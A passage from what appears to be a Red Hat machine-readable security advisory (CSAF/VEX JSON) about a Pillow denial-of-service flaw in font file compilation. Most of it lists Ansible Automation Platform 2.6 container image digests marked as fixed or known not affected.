"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2497466"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. When processing a specially crafted font file, the library\u0027s font compilation function does not adequately check for excessive memory allocation. This oversight allows a remote attacker to trigger an unreasonable consumption of system memory, leading to a denial of service (DoS) for the application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pillow: Pillow: Denial of Service via excessive memory allocation when processing font files",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A flaw was found in Pillow prior to version 12.3.0. The FontFile.compile() method in PIL/FontFile.py assembles per-glyph images into a combined bitmap using Image.new() without calling Image._decompression_bomb_check(). This allows a specially crafted font file to trigger excessive memory allocation during conversion or saving, leading to denial of service via resource exhaustion.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
